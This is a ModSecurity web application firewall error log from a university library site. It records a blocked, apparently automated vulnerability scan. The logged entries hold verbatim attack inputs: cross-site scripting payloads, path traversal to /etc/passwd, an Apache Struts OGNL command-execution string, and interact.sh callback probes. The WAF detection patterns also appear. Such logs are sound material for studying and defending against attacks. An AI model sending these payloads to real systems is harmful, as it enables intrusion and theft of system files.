[Tue Aug 29 11:49:09.397791 2023] [:error] [pid 2408] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{\\x22 found within ARGS:query: {\\x22tax_query\\x22:{\\x220\\x22:{\\x22field\\x22:\\x22term_taxonomy_id\\x22,\\x22terms\\x22:[\\x22\\x22]}}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO14xcCo-f0AAAlo01cAAAAJ"]
[Tue Aug 29 11:49:09.448919 2023] [:error] [pid 2354] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:USERNAME. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onerror= found within ARGS:USERNAME: <img src=x onerror=\\x22confirm(document.domain)\\x22>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "digilibft.unla.ac.id"] [uri "/siteminderagent/forms/smaceauth.fcc"] [unique_id "ZO14xcCo-f0AAAkyyAgAAAAW"]
[Tue Aug 29 11:49:15.404319 2023] [:error] [pid 2347] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:id: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibft.unla.ac.id"] [uri "/eam/vib"] [unique_id "ZO14y8Co-f0AAAkr0BgAAAAC"]
[Tue Aug 29 11:50:55.581372 2023] [:error] [pid 2376] [client 85.208.96.209] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Last Planner System\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15L8Co-f0AAAlIBdgAAAAn"]
[Tue Aug 29 11:51:05.336265 2023] [:error] [pid 2152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:type: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/cliniccases/lib/php/data/messages_load.php"] [unique_id "ZO15OcCo-f0AAAhoHN0AAAAl"]
[Tue Aug 29 11:51:05.474747 2023] [:error] [pid 2376] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibft.unla.ac.id"] [uri "/exchweb/bin/redir.asp"] [unique_id "ZO15OcCo-f0AAAlIBeMAAAAn"]
[Tue Aug 29 11:51:05.555012 2023] [:error] [pid 2343] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:settingsform[newpassword1]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:settingsform[newpassword1]: pdteam' onclick='alert(document.domain)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibft.unla.ac.id"] [uri "/install.php"] [unique_id "ZO15OcCo-f0AAAknEMAAAAAB"]
[Tue Aug 29 11:51:05.720067 2023] [:error] [pid 2489] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:expression. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22) ,# found within ARGS:expression: (#_memberAccess[\\x22allowStaticMethodAccess\\x22]=true,#foo=new java.lang.Boolean(\\x22false\\x22) ,#context[\\x22xwork.MethodAccessor.denyMethodExecution\\x22]=#foo,@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('cat /etc/passwd').getInputStream()))"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/devmode.action"] [unique_id "ZO15OcCo-f0AAAm5BuEAAAAA"]
[Tue Aug 29 11:51:06.151360 2023] [:error] [pid 2152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:username: <img/src/onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibft.unla.ac.id"] [uri "/cas/v1/tickets/"] [unique_id "ZO15OsCo-f0AAAhoHOsAAAAl"]
[Tue Aug 29 11:51:06.193648 2023] [:error] [pid 2152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibft.unla.ac.id"] [uri "/"] [unique_id "ZO15OsCo-f0AAAhoHO0AAAAl"]
[Tue Aug 29 11:51:08.534696 2023] [:error] [pid 2440] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:log. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within ARGS:log: {{username}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibft.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZO15PMCo-f0AAAmIbOgAAAAo"]
[Tue Aug 29 11:51:08.571302 2023] [:error] [pid 2491] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:errors[fu-disallowed-mime-type][0][name]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:errors[fu-disallowed-mime-type][0][name]: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/"] [unique_id "ZO15PMCo-f0AAAm7m8UAAAAE"]
[Tue Aug 29 11:51:09.571878 2023] [:error] [pid 2501] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:country. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:country: <img src=x onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15PcCo-f0AAAnFrv8AAAAP"]
[Tue Aug 29 11:51:09.588714 2023] [:error] [pid 2489] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:settingsform[firstname]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:settingsform[firstname]: pdteam' onclick='alert(document.domain)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibft.unla.ac.id"] [uri "/install.php"] [unique_id "ZO15PcCo-f0AAAm5Bv8AAAAA"]
[Tue Aug 29 11:51:10.723120 2023] [:error] [pid 2489] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:filename: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/tools/sourceViewer/index.html"] [unique_id "ZO15PsCo-f0AAAm5BwEAAAAA"]
[Tue Aug 29 11:51:11.566908 2023] [:error] [pid 2439] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:category. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:category: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15P8Co-f0AAAmHd9IAAAAz"]
[Tue Aug 29 11:51:12.788618 2023] [:error] [pid 2440] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:url: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/plugins/servlet/svnwebclient/changedResource.jsp"] [unique_id "ZO15QMCo-f0AAAmIbPYAAAAo"]
[Tue Aug 29 11:51:13.607609 2023] [:error] [pid 2448] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15QcCo-f0AAAmQ-wQAAAAb"]
[Tue Aug 29 11:51:13.619521 2023] [:error] [pid 2498] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dflink. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:dflink: ../../../configuration.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15QcCo-f0AAAnCKx8AAAAK"]
[Tue Aug 29 11:51:13.692765 2023] [:error] [pid 2508] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS_NAMES:');alert("XSS. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS_NAMES:');alert(\\x22XSS: ');alert(\\x22XSS"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/plugins/servlet/svnwebclient/commitGraph.jsp"] [unique_id "ZO15QcCo-f0AAAnMeoAAAAAD"]
[Tue Aug 29 11:51:14.715073 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:url: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/plugins/servlet/svnwebclient/commitGraph.jsp"] [unique_id "ZO15QsCo-f0AAAlUlhoAAAA0"]
[Tue Aug 29 11:51:15.671985 2023] [:error] [pid 2269] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15Q8Co-f0AAAjdQTUAAAAZ"]
[Tue Aug 29 11:51:15.752889 2023] [:error] [pid 2424] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:graph. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:graph: \\x22zlo onerror=alert(1) \\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/php/device_graph_page.php"] [unique_id "ZO15Q8Co-f0AAAl4sXoAAAAf"]
[Tue Aug 29 11:51:15.753076 2023] [:error] [pid 2145] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:errormessage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '\\x22>< found within ARGS:errormessage: '\\x22><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/plugins/servlet/svnwebclient/error.jsp"] [unique_id "ZO15Q8Co-f0AAAhhc0sAAAAd"]
[Tue Aug 29 11:51:15.840758 2023] [:error] [pid 2445] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15Q8Co-f0AAAmNp3AAAAAQ"]
[Tue Aug 29 11:51:16.552455 2023] [:error] [pid 2445] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:url: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/plugins/servlet/svnwebclient/statsItem.jsp"] [unique_id "ZO15RMCo-f0AAAmNp3MAAAAQ"]
[Tue Aug 29 11:51:17.811071 2023] [:error] [pid 2347] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:path: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15RcCo-f0AAAkr0EwAAAAC"]
[Tue Aug 29 11:51:17.935834 2023] [:error] [pid 2445] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:api_url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:api_url: api_url'><script>alert(document.domain)</script> "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/wp-content/plugins/swipehq-payment-gateway-woocommerce/test-plugin.php"] [unique_id "ZO15RcCo-f0AAAmNp3UAAAAQ"]
[Tue Aug 29 11:51:20.538756 2023] [:error] [pid 2494] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )\\x22>< found within ARGS:id: </form><iMg src=x onerror=\\x22prompt(document.domain)\\x22><form>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/Forms/rpAuth_1"] [unique_id "ZO15SMCo-f0AAAm@5xUAAAAH"]
[Tue Aug 29 11:51:20.697715 2023] [:error] [pid 2343] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:id: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/phpmyadmin/setup/index.php"] [unique_id "ZO15SMCo-f0AAAknEOUAAAAB"]
